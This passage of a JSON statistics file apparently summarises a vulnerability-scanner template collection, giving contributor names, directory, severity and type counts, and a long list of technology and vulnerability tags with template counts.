(@cristivlad25)","count":2},{"name":"swissky","count":2},{"name":"foulenzer","count":2},{"name":"cckuakilong","count":2},{"name":"joeldeleep","count":2},{"name":"udit_thakkur","count":2},{"name":"hahwul","count":2},{"name":"hackerarpan","count":2},{"name":"gevakun","count":2},{"name":"bing0o","count":2},{"name":"hetroublemakr","count":2},{"name":"danielmofer","count":2},{"name":"x1m_martijn","count":2},{"name":"vsh00t","count":2},{"name":"pxmme1337","count":2},{"name":"cocxanh","count":2},{"name":"0xelkomy","count":2},{"name":"y4er","count":2},{"name":"dahse89","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"nkxxkn","count":2},{"name":"geekby","count":2},{"name":"koti2","count":2},{"name":"r12w4n","count":2},{"name":"bananabr","count":2},{"name":"huowuzhao","count":2},{"name":"thardt-praetorian","count":2},{"name":"raesene","count":2},{"name":"ehsahil","count":2},{"name":"luci","count":2},{"name":"nuk3s3c","count":2},{"name":"redteambrasil","count":2},{"name":"splint3r7","count":2},{"name":"k11h-de","count":2},{"name":"gal nagli","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"moritz nentwig","count":2},{"name":"parth","count":2},{"name":"bsysop","count":2},{"name":"smaranchand","count":2},{"name":"taielab","count":2},{"name":"ajaysenr","count":2},{"name":"paradessia","count":2},{"name":"h1ei1","count":2},{"name":"its0x08","count":2},{"name":"paperpen","count":2},{"name":"convisoappsec","count":2},{"name":"martincodes-de","count":2},{"name":"w4cky_","count":2},{"name":"0xsmiley","count":2},{"name":"zomsop82","count":2},{"name":"streetofhackerr007","count":1},{"name":"blckraven","count":1},{"name":"sshell","count":1},{"name":"d4vy","count":1},{"name":"evolutionsec","count":1},{"name":"deena","count":1},{"name":"myztique","count":1},{"name":"husain","count":1},{"name":"bartu utku sarp","count":1},{"name":"bad5ect0r","count":1},{"name":"retr0","count":1},{"name":"luqman","count":1},{"name":"francescocarlucci","count":1},{"name":"patralos","count":1},{"name":"andysvints","count":1},{"name":"mass0ma","count":1},{"name":"berkdusunur","count":1},{"name":"orpheus","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"jteles","count":1},{"name":"3th1c_yuk1","count":1},{"name":"thebinitghimire","count":1},{"name":"dhiyaneshdki","count":1},{"name":"x6263","count":1},{"name":"whynotke","count":1},{"name":"j33n1k4","count":1},{"name":"nerrorsec","count":1},{"name":"sicksec","count":1},{"name":"remonsec","count":1},{"name":"alperenkesk","count":1},{"name":"skylark-lab","count":1},{"name":"cookiehanhoan","count":1},{"name":"igibanez","count":1},{"name":"infosecsanyam","count":1},{"name":"coldfish","count":1},{"name":"arall","count":1},{"name":"daviey","count":1},{"name":"brabbit10","count":1},{"name":"tirtha","count":1},{"name":"kaizensecurity","count":1},{"name":"hexcat","count":1},{"name":"rschio","count":1},{"name":"ahmed abou-ela","count":1},{"name":"fmunozs","count":1},{"name":"jeya seelan","count":1},{"name":"0xtavian","count":1},{"name":"phyr3wall","count":1},{"name":"shifacyclewla","count":1},{"name":"0xd0ff9","count":1},{"name":"yashgoti","count":1},{"name":"omarkurt","count":1},{"name":"apt-mirror","count":1},{"name":"zinminphy0","count":1},{"name":"0xceeb","count":1},{"name":"akash.c","count":1},{"name":"0xceba","count":1},{"name":"kurohost","count":1},{"name":"petruknisme","count":1},{"name":"ooooooo_q","count":1},{"name":"thevillagehacker","count":1},{"name":"justmumu","count":1},{"name":"2rs3c","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"aresx","count":1},{"name":"duty_1g","count":1},{"name":"compr00t","count":1},{"name":"shelld3v","count":1},{"name":"v0idc0de","count":1},{"name":"d0rkerdevil","count":1},{"name":"ggranjus","count":1},{"name":"philippdelteil","count":1},{"name":"ahmetpergamum","count":1},{"name":"manasmbellani","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"ringo","count":1},{"name":"manuelbua","count":1},{"name":"furkansayim","count":1},{"name":"geraldino2","count":1},{"name":"majidmc2","count":1},{"name":"th3.d1p4k","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"hakluke","count":1},{"name":"pudsec","count":1},{"name":"yuansec","count":1},{"name":"zsusac","count":1},{"name":"amnotacat","count":1},{"name":"b4uh0lz","count":1},{"name":"lark lab","count":1},{"name":"c3l3si4n","count":1},{"name":"rotemreiss","count":1},{"name":"nytr0gen","count":1},{"name":"xeldax","count":1},{"name":"elder tao","count":1},{"name":"iampritam","count":1},{"name":"rojanrijal","count":1},{"name":"jeya.seelan","count":1},{"name":"pdp","count":1},{"name":"jrolf","count":1},{"name":"tea","count":1},{"name":"ohlinge","count":1},{"name":"act1on3","count":1},{"name":"jas37","count":1},{"name":"zandros0","count":1},{"name":"brenocss","count":1},{"name":"osamahamad","count":1},{"name":"akshansh","count":1},{"name":"notnotnotveg","count":1},{"name":"absshax","count":1},{"name":"clarkvoss","count":1},{"name":"retr02332","count":1},{"name":"yavolo","count":1},{"name":"schniggie","count":1},{"name":"nielsing","count":1},{"name":"wlayzz","count":1},{"name":"exid","count":1},{"name":"miroslavsotak","count":1},{"name":"izn0u","count":1},{"name":"gboddin","count":1},{"name":"alex","count":1},{"name":"anon-artist","count":1},{"name":"s1r1u5_","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"undefl0w","count":1},{"name":"makyotox","count":1},{"name":"mesaglio","count":1},{"name":"zhenwarx","count":1},{"name":"notsoevilweasel","count":1},{"name":"affix","count":1},{"name":"charanrayudu","count":1},{"name":"toufik-airane","count":1},{"name":"hanlaomo","count":1},{"name":"_darrenmartyn","count":1},{"name":"bughuntersurya","count":1},{"name":"0ut0fb4nd","count":1},{"name":"official_blackhat13","count":1},{"name":"prettyboyaaditya","count":1},{"name":"willd96","count":1},{"name":"opencirt","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"0xteles","count":1},{"name":"fopina","count":1},{"name":"udyz","count":1},{"name":"rubina119","count":1},{"name":"luskabol","count":1},{"name":"xstp","count":1},{"name":"ok_bye_now","count":1},{"name":"narluin","count":1},{"name":"bjhulst","count":1},{"name":"becivells","count":1},{"name":"thesubtlety","count":1},{"name":"noamrathaus","count":1},{"name":"mhdsamx","count":1},{"name":"kiks7","count":1},{"name":"yashanand155","count":1},{"name":"0xrod","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"soyelmago","count":1},{"name":"0xh7ml","count":1},{"name":"oscarintherocks","count":1},{"name":"push4d","count":1},{"name":"flag007","count":1},{"name":"adrianmf","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"elmahdi","count":1},{"name":"qlkwej","count":1},{"name":"regala_","count":1},{"name":"mah3sec_","count":1},{"name":"sec_hawk","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"ilovebinbash","count":1},{"name":"momen eldawakhly","count":1},{"name":"lethargynavigator","count":1},{"name":"harshinsecurity","count":1},{"name":"alevsk","count":1},{"name":"_harleo","count":1},{"name":"shreyapohekar","count":1},{"name":"kareemse1im","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"droberson","count":1},{"name":"xshuden","count":1},{"name":"_c0wb0y_","count":1},{"name":"tirtha_mandal","count":1},{"name":"tim_koopmans","count":1},{"name":"micha3lb3n","count":1},{"name":"ipanda","count":1},{"name":"sickwell","count":1},{"name":"kabirsuda","count":1},{"name":"arr0way","count":1},{"name":"sherlocksecurity","count":1},{"name":"chron0x","count":1},{"name":"ldionmarcil","count":1},{"name":"rodnt","count":1},{"name":"un-fmunozs","count":1},{"name":"fq_hsu","count":1},{"name":"intx0x80","count":1},{"name":"florianmaak","count":1},{"name":"revblock","count":1},{"name":"furkansenan","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"borna nematzadeh","count":1},{"name":"wabafet","count":1},{"name":"pratik khalane","count":1},{"name":"veshraj","count":1},{"name":"co0nan","count":1},{"name":"andirrahmani1","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"dawid-czarnecki","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"jiheon-dev","count":1},{"name":"p-l-","count":1},{"name":"exploitation","count":1},{"name":"f1she3","count":1},{"name":"jbaines-r7","count":1},{"name":"b0rn2r00t","count":1},{"name":"vzamanillo","count":1},{"name":"0h1in9e","count":1},{"name":"juicypotato1","count":1},{"name":"knassar702","count":1},{"name":"elouhi","count":1},{"name":"exceed","count":1},{"name":"thezakman","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"breno_css","count":1},{"name":"noobexploiter","count":1},{"name":"mubassirpatel","count":1},{"name":"rafaelwdornelas","count":1},{"name":"ahmed sherif","count":1},{"name":"daffianfo","count":1},{"name":"luqmaan hadia","count":1},{"name":"ofjaaah","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"evan rubinstien","count":1},{"name":"b0yd","count":1},{"name":"aaronchen0","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"kailashbohara","count":1}],"directory":[{"name":"cves","count":1135},{"name":"exposed-panels","count":511},{"name":"vulnerabilities","count":444},{"name":"technologies","count":250},{"name":"exposures","count":202},{"name":"misconfiguration","count":194},{"name":"workflows","count":186},{"name":"token-spray","count":153},{"name":"default-logins","count":93},{"name":"takeovers","count":67},{"name":"file","count":60},{"name":"iot","count":38},{"name":"network","count":35},{"name":"miscellaneous","count":23},{"name":"cnvd","count":22},{"name":"dns","count":17},{"name":"fuzzing","count":11},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1165},{"name":"high","count":861},{"name":"medium","count":649},{"name":"critical","count":405},{"name":"low","count":178},{"name":"unknown","count":6}],"types":[{"name":"http","count":3129},{"name":"file","count":60},{"name":"network","count":49},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1146},{"name":"panel","count":513},{"name":"lfi","count":460},{"name":"xss","count":361},{"name":"wordpress","count":358},{"name":"exposure","count":292},{"name":"rce","count":288},{"name":"cve2021","count":282},{"name":"tech","count":265},{"name":"wp-plugin","count":259},{"name":"cve2020","count":196},{"name":"","count":188},{"name":"token-spray","count":153},{"name":"joomla","count":131},{"name":"config","count":126},{"name":"cve2018","count":120},{"name":"apache","count":120},{"name":"cve2019","count":117},{"name":"cve2010","count":111},{"name":"default-login","count":108},{"name":"unauth","count":102},{"name":"iot","count":102},{"name":"oast","count":96},{"name":"login","count":85},{"name":"takeover","count":73},{"name":"token","count":72},{"name":"redirect","count":68},{"name":"misconfig","count":65},{"name":"cve2017","count":63},{"name":"sqli","count":62},{"name":"ssrf","count":60},{"name":"file","count":60},{"name":"cve2022","count":58},{"name":"network","count":53},{"name":"oracle","count":50},{"name":"wp","count":49},{"name":"router","count":49},{"name":"cve2016","count":45},{"name":"disclosure","count":45},{"name":"plugin","count":40},{"name":"cve2014","count":37},{"name":"auth-bypass","count":37},{"name":"cve2015","count":36},{"name":"google","count":36},{"name":"cisco","count":35},{"name":"authenticated","count":35},{"name":"logs","count":33},{"name":"atlassian","count":32},{"name":"injection","count":30},{"name":"jira","count":30},{"name":"listing","count":30},{"name":"traversal","count":29},{"name":"devops","count":28},{"name":"generic","count":25},{"name":"kubernetes","count":25},{"name":"oss","count":24},{"name":"springboot","count":24},{"name":"adobe","count":24},{"name":"cms","count":24},{"name":"sap","count":22},{"name":"cnvd","count":22},{"name":"proxy","count":22},{"name":"intrusive","count":21},{"name":"microsoft","count":21},{"name":"aem","count":21},{"name":"vmware","count":21},{"name":"misc","count":21},{"name":"debug","count":21},{"name":"fuzz","count":20},{"name":"service","count":20},{"name":"wp-theme","count":19},{"name":"cve2012","count":19},{"name":"dns","count":18},{"name":"manageengine","count":18},{"name":"php","count":18},{"name":"deserialization","count":17},{"name":"zoho","count":17},{"name":"weblogic","count":17},{"name":"tomcat","count":17},{"name":"aws","count":17},{"name":"ibm","count":16},{"name":"k8s","count":16},{"name":"cve2011","count":15},{"name":"jenkins","count":15},{"name":"dlink","count":15},{"name":"struts","count":15},{"name":"gitlab","count":15},{"name":"java","count":14},{"name":"xxe","count":14},{"name":"cve2009","count":14},{"name":"hp","count":14},{"name":"api","count":14},{"name":"fileupload","count":14},{"name":"android","count":14},{"name":"ruijie","count":13},{"name":"camera","count":13},{"name":"netsweeper","count":12},{"name":"rails","count":12},{"name":"status","count":12},{"name":"log4j","count":12},{"name":"cve2013","count":12},{"name":"printer","count":12},{"name":"cnvd2021","count":11},{"name":"graphql","count":11},{"name":"firewall","count":11},{"name":"netgear","count":11},{"name":"nginx","count":11},{"name":"lfr","count":11},{"name":"magento","count":11},{"name":"upload","count":11},{"name":"airflow","count":10},{"name":"grafana","count":10},{"name":"glpi","count":10},{"name":"coldfusion","count":10},{"name":"backup","count":10},{"name":"fortigate","count":10},{"name":"spring","count":10},{"name":"auth","count":10},{"name":"jolokia","count":10},{"name":"dell","count":10},{"name":"jndi","count":9},{"name":"fortinet","count":9},{"name":"ftp","count":9},{"name":"windows","count":9},{"name":"woocommerce","count":9},{"name":"cve2008","count":9},{"name":"drupal","count":9},{"name":"github","count":9},{"name":"webserver","count":9},{"name":"laravel","count":9},{"name":"zabbix","count":9},{"name":"fastjson","count":9},{"name":"scada","count":8},{"name":"azure","count":8},{"name":"vcenter","count":8},{"name":"prometheus","count":8},{"name":"bypass","count":8},{"name":"amazon","count":8},{"name":"confluence","count":8},{"name":"solr","count":8},{"name":"iis","count":8},{"name":"wso2","count":8},{"name":"citrix","count":8},{"name":"phpmyadmin","count":8},{"name":"metadata","count":8},{"name":"blind","count":8},{"name":"mirai","count":8},{"name":"audit","count":8},{"name":"django","count":8},{"name":"rconfig","count":7},{"name":"kafka","count":7},{"name":"ssti","count":7},{"name":"firebase","count":7},{"name":"elasticsearch","count":7},{"name":"files","count":7},{"name":"maps","count":7},{"name":"mail","count":7},{"name":"vpn","count":7},{"name":"sonicwall","count":7},{"name":"bucket","count":7},{"name":"exchange","count":7},{"name":"python","count":7},{"name":"squirrelmail","count":7},{"name":"kube","count":7},{"name":"jetty","count":6},{"name":"cicd","count":6},{"name":"cnvd2020","count":6},{"name":"nodejs","count":6},{"name":"lucee","count":6},{"name":"cobbler","count":6},{"name":"backdoor","count":6},{"name":"druid","count":6},{"name":"sitecore","count":6},{"name":"enum","count":6},{"name":"jboss","count":6},{"name":"zimbra","count":6},{"name":"slack","count":6},{"name":"crlf","count":6},{"name":"firmware","count":6},{"name":"docker","count":6},{"name":"ofbiz","count":6},{"name":"fpd","count":6},{"name":"huawei","count":6},{"name":"go","count":6},{"name":"headless","count":6},{"name":"magmi","count":6},{"name":"error","count":5},{"name":"bigip","count":5},{"name":"minio","count":5},{"name":"keycloak","count":5},{"name":"rfi","count":5},{"name":"circarlife","count":5},{"name":"leak","count":5},{"name":"zhiyuan","count":5},{"name":"moodle","count":5},{"name":"ecology","count":5},{"name":"ruby","count":5},{"name":"icewarp","count":5},{"name":"rseenet","count":5},{"name":"apisix","count":5},{"name":"opensis","count":5},{"name":"node","count":5},{"name":"alibaba","count":5},{"name":"thinkphp","count":5},{"name":"strapi","count":5},{"name":"solarwinds","count":5},{"name":"setup","count":5},{"name":"fatpipe","count":5},{"name":"samsung","count":5},{"name":"metinfo","count":5},{"name":"gocd","count":5},{"name":"kubelet","count":5},{"name":"git","count":5},{"name":"storage","count":5},{"name":"artica","count":5},{"name":"microweber","count":5},{"name":"cache","count":5},{"name":"symantec","count":5},{"name":"symfony","count":5},{"name":"ssl","count":5},{"name":"dedecms","count":5},{"name":"ognl","count":4},{"name":"awstats","count":4},{"name":"cacti","count":4},{"name":"plesk","count":4},{"name":"jellyfin","count":4},{"name":"springcloud","count":4},{"name":"hikvision","count":4},{"name":"aspose","count":4},{"name":"oa","count":4},{"name":"cockpit","count":4},{"name":"caucho","count":4},{"name":"paypal","count":4},{"name":"terramaster","count":4},{"name":"resin","count":4},{"name":"hpe","count":4},{"name":"wcs","count":4},{"name":"flink","count":4},{"name":"activemq","count":4},{"name":"sonarqube","count":4},{"name":"panos","count":4},{"name":"mongodb","count":4},{"name":"buffalo","count":4},{"name":"couchdb","count":4},{"name":"search","count":4},{"name":"websphere","count":4},{"name":"jetbrains","count":4},{"name":"db","count":4},{"name":"kevinlab","count":4},{"name":"nexus","count":4},{"name":"xmlrpc","count":4},{"name":"beyondtrust","count":4},{"name":"puppet","count":4},{"name":"smtp","count":4},{"name":"tikiwiki","count":4},{"name":"microstrategy","count":4},{"name":"cve2007","count":4},{"name":"voip","count":4},{"name":"ssh","count":4},{"name":"hoteldruid","count":4},{"name":"stripe","count":4},{"name":"thinkcmf","count":4},{"name":"adminer","count":4},{"name":"asp","count":4},{"name":"elastic","count":4},{"name":"artifactory","count":4},{"name":"photo","count":4},{"name":"prestashop","count":4},{"name":"gogs","count":4},{"name":"cnvd2019","count":4},{"name":"kibana","count":4},{"name":"hongdian","count":4},{"name":"npm","count":4},{"name":"zyxel","count":4},{"name":"cloud","count":4},{"name":"mailchimp","count":4},{"name":"movable","count":3},{"name":"actuator","count":3},{"name":"postmessage","count":3},{"name":"phppgadmin","count":3},{"name":"javascript","count":3},{"name":"ampps","count":3},{"name":"webadmin","count":3},{"name":"fanruan","count":3},{"name":"openemr","count":3},{"name":"splunk","count":3},{"name":"pentaho","count":3},{"name":"linkedin","count":3},{"name":"openssh","count":3},{"name":"wordfence","count":3},{"name":"httpbin","count":3},{"name":"jfrog","count":3},{"name":"linksys","count":3},{"name":"odoo","count":3},{"name":"heroku","count":3},{"name":"nacos","count":3},{"name":"fuelcms","count":3},{"name":"sql","count":3},{"name":"cisa","count":3},{"name":"netlify","count":3},{"name":"lotus","count":3},{"name":"telerik","count":3},{"name":"phpinfo","count":3},{"name":"ems","count":3},{"name":"mcafee","count":3},{"name":"seeyon","count":3},{"name":"square","count":3},{"name":"axis2","count":3},{"name":"kentico","count":3},{"name":"sophos","count":3},{"name":"concrete","count":3},{"name":"messaging","count":3},{"name":"dolibarr","count":3},{"name":"ebs","count":3},{"name":"vbulletin","count":3},{"name":"dreambox","count":3},{"name":"fortios","count":3},{"name":"horizon","count":3},{"name":"globalprotect","count":3},{"name":"jeesns","count":3},{"name":"consul","count":3},{"name":"trendnet","count":3},{"name":"graph","count":3},{"name":"log","count":3},{"name":"openbmcs","count":3},{"name":"samba","count":3},{"name":"targa","count":3},{"name":"sendgrid","count":3},{"name":"jamf","count":3},{"name":"dos","count":3},{"name":"workspaceone","count":3},{"name":"geowebserver","count":3},{"name":"redis","count":3},{"name":"grav","count":3},{"name":"zeroshell","count":3},{"name":"synology","count":3},{"name":"aptus","count":3},{"name":"openam","count":3},{"name":"elfinder","count":3},{"name":"seagate","count":3},{"name":"kingsoft","count":3},{"name":"mongo","count":3},{"name":"voipmonitor","count":3},{"name":"axis","count":3},{"name":"bruteforce","count":3},{"name":"exposures","count":3},{"name":"rlm","count":3},{"name":"prtg","count":3},{"name":"hashicorp","count":3},{"name":"empirecms","count":3},{"name":"vrealize","count":3},{"name":"bitrix","count":3},{"name":"thinfinity","count":3},{"name":"centos","count":3},{"name":"oauth","count":3},{"name":"facebook","count":3},{"name":"smb","count":3},{"name":"lansweeper","count":3},{"name":"selea","count":3},{"name":"subrion","count":3},{"name":"sugarcrm","count":3},{"name":"nosqli","count":3},{"name":"trixbox","count":3},{"name":"database","count":3},{"name":"glassfish","count":3},{"name":"httpd","count":3},{"name":"axigen","count":3},{"name":"linkerd","count":3},{"name":"sharepoint","count":3},{"name":"nuuo","count":3},{"name":"3cx","count":3},{"name":"epson","count":3},{"name":"circleci","count":3},{"name":"sentry","count":2},{"name":"backups","count":2},{"name":"motorola","count":2},{"name":"pbootcms","count":2},{"name":"dotcms","count":2},{"name":"gitlist","count":2},{"name":"metabase","count":2},{"name":"filemanager","count":2},{"name":"ansible","count":2},{"name":"chamilo","count":2},{"name":"cas","count":2},{"name":"maian","count":2},{"name":"ranger","count":2},{"name":"showdoc","count":2},{"name":"panabit","count":2},{"name":"phpstorm","count":2},{"name":"seacms","count":2},{"name":"openstack","count":2},{"name":"vidyo","count":2},{"name":"pacsone","count":2},{"name":"rackn","count":2},{"name":"owasp","count":2},{"name":"zte","count":2},{"name":"konga","count":2},{"name":"cve2005","count":2},{"name":"weather","count":2},{"name":"cloudflare","count":2},{"name":"auerswald","count":2},{"name":"lantronix","count":2},{"name":"nextcloud","count":2},{"name":"javamelody","count":2},{"name":"conductor","count":2},{"name":"flightpath","count":2},{"name":"places","count":2},{"name":"thruk","count":2},{"name":"password","count":2},{"name":"yapi","count":2},{"name":"glances","count":2},{"name":"swagger","count":2},{"name":"matrix","count":2},{"name":"emerge","count":2},{"name":"typo3","count":2},{"name":"cve2006","count":2},{"name":"itop","count":2},{"name":"couchbase","count":2},{"name":"zerof","count":2},{"name":"mida","count":2},{"name":"ametys","count":2},{"name":"dubbo","count":2},{"name":"bomgar","count":2},{"name":"sangfor","count":2},{"name":"rockmongo","count":2},{"name":"twitter","count":2},{"name":"influxdb","count":2},{"name":"ecoa","count":2},{"name":"openwrt","count":2},{"name":"virtualui","count":2},{"name":"hostheader-injection","count":2},{"name":"ad","count":2},{"name":"rancher","count":2},{"name":"proftpd","count":2},{"name":"traefik","count":2},{"name":"netsus","count":2},{"name":"rabbitmq","count":2},{"name":"neos","count":2},{"name":"fortimail","count":2},{"name":"avtech","count":2},{"name":"tidb","count":2},{"name":"text","count":2},{"name":"intellian","count":2},{"name":"justwriting","count":2},{"name":"supermicro","count":2},{"name":"wamp","count":2},{"name":"nextjs","count":2},{"name":"clusterengine","count":2},{"name":"appcms","count":2},{"name":"ovirt","count":2},{"name":"ambari","count":2},{"name":"avantfax","count":2},{"name":"emqx","count":2},{"name":"netscaler","count":2},{"name":"yii","count":2},{"name":"dynamicweb","count":2},{"name":"payara","count":2},{"name":"ilo","count":2},{"name":"alienvault","count":2},{"name":"csrf","count":2},{"name":"sqlite","count":2},{"name":"apollo","count":2},{"name":"myfactory","count":2},{"name":"jsf","count":2},{"name":"igs","count":2},{"name":"exacqvision","count":2},{"name":"pascom","count":2},{"name":"pega","count":2},{"name":"bigant","count":2},{"name":"sidekiq","count":2},{"name":"zzzcms","count":2},{"name":"rstudio","count":2},{"name":"docs","count":2},{"name":"linux","count":2},{"name":"kong","count":2},{"name":"bigbluebutton","count":2},{"name":"labkey","count":2},{"name":"zblogphp","count":2},{"name":"webmin","count":2},{"name":"redash","count":2},{"name":"aviatrix","count":2},{"name":"jeedom","count":2},{"name":"gitbook","count":2},{"name":"avaya","count":2},{"name":"dotnetnuke","count":2},{"name":"frontpage","count":2},{"name":"code42","count":2},{"name":"cloudinary","count":2},{"name":"pcoip","count":2},{"name":"versa","count":2},{"name":"xerox","count":2},{"name":"wuzhicms","count":2},{"name":"mailgun","count":2},{"name":"terraform","count":2},{"name":"ivanti","count":2},{"name":"acrolinx","count":2},{"name":"natshell","count":2},{"name":"arcgis","count":2},{"name":"listserv","count":2},{"name":"orchid","count":2},{"name":"alfresco","count":2},{"name":"akamai","count":2},{"name":"electron","count":2},{"name":"openfire","count":2},{"name":"cyberoam","count":2},{"name":"ericsson","count":2},{"name":"commax","count":2},{"name":"rocketchat","count":2},{"name":"watchguard","count":2},{"name":"pgadmin","count":2},{"name":"pfsense","count":2},{"name":"mantisbt","count":2},{"name":"wooyun","count":2},{"name":"tongda","count":2},{"name":"azkaban","count":2},{"name":"apereo","count":2},{"name":"shenyu","count":2},{"name":"forcepoint","count":2},{"name":"cgi","count":2},{"name":"idea","count":2},{"name":"dvwa","count":2},{"name":"otobo","count":2},{"name":"syslog","count":2},{"name":"circontrol","count":2},{"name":"rosariosis","count":2},{"name":"pulse","count":2},{"name":"gitea","count":2},{"name":"impresscms","count":2},{"name":"graphite","count":2},{"name":"mobileiron","count":2},{"name":"iptime","count":2},{"name":"resourcespace","count":2},{"name":"sequoiadb","count":2},{"name":"favicon","count":2},{"name":"intercom","count":2},{"name":"digitalrebar","count":2},{"name":"seeddms","count":2},{"name":"chyrp","count":2},{"name":"saltstack","count":2},{"name":"hubspot","count":2},{"name":"s3","count":2},{"name":"plastic","count":2},{"name":"nagios","count":2},{"name":"chiyu","count":2},{"name":"seowon","count":2},{"name":"guacamole","count":2},{"name":"xxljob","count":2},{"name":"tileserver","count":2},{"name":"ghost","count":2},{"name":"homematic","count":2},{"name":"tableau","count":2},{"name":"sdwan","count":2},{"name":"domxss","count":2},{"name":"fortiweb","count":2},{"name":"hadoop","count":2},{"name":"phpcollab","count":2},{"name":"totemomail","count":2},{"name":"viewpoint","count":2},{"name":"airtame","count":2},{"name":"detect","count":2},{"name":"jmx","count":2},{"name":"tenda","count":2},{"name":"netflix","count":2},{"name":"tapestry","count":2},{"name":"servicenow","count":2},{"name":"octoprint","count":2},{"name":"pam","count":2},{"name":"casdoor","count":2},{"name":"xweb500","count":2},{"name":"cocoon","count":2},{"name":"aruba","count":2},{"name":"jquery","count":2},{"name":"middleware","count":2},{"name":"qihang","count":2},{"name":"idrac","count":2},{"name":"craftcms","count":2},{"name":"projectsend","count":2},{"name":"shellshock","count":2},{"name":"netdata","count":2},{"name":"embed","count":2},{"name":"smartstore","count":2},{"name":"mbean","count":2},{"name":"hiveos","count":2},{"name":"codeigniter","count":2},{"name":"sysaid","count":2},{"name":"rackstation","count":2},{"name":"lighttpd","count":2},{"name":"metersphere","count":2},{"name":"kafdrop","count":2},{"name":"ucmdb","count":2},{"name":"jitsi","count":2},{"name":"harbor","count":2},{"name":"bmc","count":2},{"name":"getsimple","count":2},{"name":"globaldomains","count":2},{"name":"checkpoint","count":2},{"name":"kiwitcms","count":2},{"name":"liferay","count":2},{"name":"nasos","count":2},{"name":"accela","count":2},{"name":"umbraco","count":2},{"name":"horde","count":2},{"name":"frp","count":2},{"name":"webcam","count":2},{"name":"gophish","count":2},{"name":"key","count":2},{"name":"ebook","count":2},{"name":"hasura","count":2},{"name":"erxes","count":2},{"name":"flir","count":2},{"name":"ruckus","count":2},{"name":"gespage","count":2},{"name":"openvpn","count":2},{"name":"qcubed","count":2},{"name":"netis","count":2},{"name":"spark","count":2},{"name":"digitalocean","count":2},{"name":"node-red-dashboard","count":2},{"name":"ec2","count":2},{"name":"mysql","count":2},{"name":"phpshowtime","count":2},{"name":"gradle","count":2},{"name":"waf","count":2},{"name":"hjtcloud","count":2},{"name":"skycaiji","count":2},{"name":"akkadian","count":2},{"name":"bitly","count":2},{"name":"lenovo","count":1},{"name":"kingdee","count":1},{"name":"k8","count":1},{"name":"alertmanager","count":1},{"name":"noptin","count":1},{"name":"turbocrm","count":1},{"name":"scalar","count":1},{"name":"hivemanager","count":1},{"name":"servicedesk","count":1},{"name":"matomo","count":1},{"name":"joget","count":1},{"name":"stem","count":1},{"name":"mkdocs","count":1},{"name":"netbiblio","count":1},{"name":"onelogin","count":1},{"name":"buildkite","count":1},{"name":"panasonic","count":1},{"name":"okta","count":1},{"name":"ubnt","count":1},{"name":"lotuscms","count":1},{"name":"version","count":1},{"name":"redmine","count":1},{"name":"securepoint","count":1},{"name":"secmail","count":1},{"name":"mspcontrol","count":1},{"name":"cx","count":1},{"name":"viewlinc","count":1},{"name":"yongyou","count":1},{"name":"wowza","count":1},{"name":"tensorflow","count":1},{"name":"launchdarkly","count":1},{"name":"mod-proxy","count":1},{"name":"tcexam","count":1},{"name":"uwsgi","count":1},{"name":"fedora","count":1},{"name":"bhagavadgita","count":1},{"name":"wazuh","count":1},{"name":"solarlog","count":1},{"name":"mpsec","count":1},{"name":"faraday","count":1},{"name":"sls","count":1},{"name":"quip","count":1},{"name":"bingmaps","count":1},{"name":"memory-pipes","count":1},{"name":"directions","count":1},{"name":"yopass","count":1},{"name":"opensearch","count":1},{"name":"blue-ocean","count":1},{"name":"zenphoto","count":1},{"name":"barracuda","count":1},{"name":"monitorix","count":1},{"name":"dbt","count":1},{"name":"geolocation","count":1},{"name":"zms","count":1},{"name":"cofense","count":1},{"name":"issabel","count":1},{"name":"intellect","count":1},{"name":"sourcebans","count":1},{"name":"gsoap","count":1},{"name":"tensorboard","count":1},{"name":"learnpress","count":1},{"name":"krweb","count":1},{"name":"gateone","count":1},{"name":"cooperhewitt","count":1},{"name":"bedita","count":1},{"name":"tika","count":1},{"name":"webpconverter","count":1},{"name":"catfishcms","count":1},{"name":"fleet","count":1},{"name":"netbeans","count":1},{"name":"roads","count":1},{"name":"dropbox","count":1},{"name":"tor","count":1},{"name":"synapse","count":1},{"name":"newrelic","count":1},{"name":"istat","count":1},{"name":"yishaadmin","count":1},{"name":"arl","count":1},{"name":"geoserver","count":1},{"name":"trane","count":1},{"name":"sofneta","count":1},{"name":"ymhome","count":1},{"name":"ilo4","count":1},{"name":"pyramid","count":1},{"name":"webmail","count":1},{"name":"ucs","count":1},{"name":"goahead","count":1},{"name":"franklinfueling","count":1},{"name":"visionhub","count":1},{"name":"loganalyzer","count":1},{"name":"argussurveillance","count":1},{"name":"triconsole","count":1},{"name":"ueditor","count":1},{"name":"ninjaform","count":1},{"name":"vscode","count":1},{"name":"autocomplete","count":1},{"name":"raspberrymatic","count":1},{"name":"cve2001","count":1},{"name":"slstudio","count":1},{"name":"avada","count":1},{"name":"dotclear","count":1},{"name":"tpshop","count":1},{"name":"prestahome","count":1},{"name":"synnefo","count":1},{"name":"opentsdb","count":1},{"name":"moin","count":1},{"name":"gpon","count":1},{"name":"prototype","count":1},{"name":"huemagic","count":1},{"name":"nordex","count":1},{"name":"dnn","count":1},{"name":"locations","count":1},{"name":"discourse","count":1},{"name":"eibiz","count":1},{"name":"cloudron","count":1},{"name":"intelliflash","count":1},{"name":"dnssec","count":1},{"name":"tinymce","count":1},{"name":"phabricator","count":1},{"name":"blockchain","count":1},{"name":"purestorage","count":1},{"name":"alltube","count":1},{"name":"dasan","count":1},{"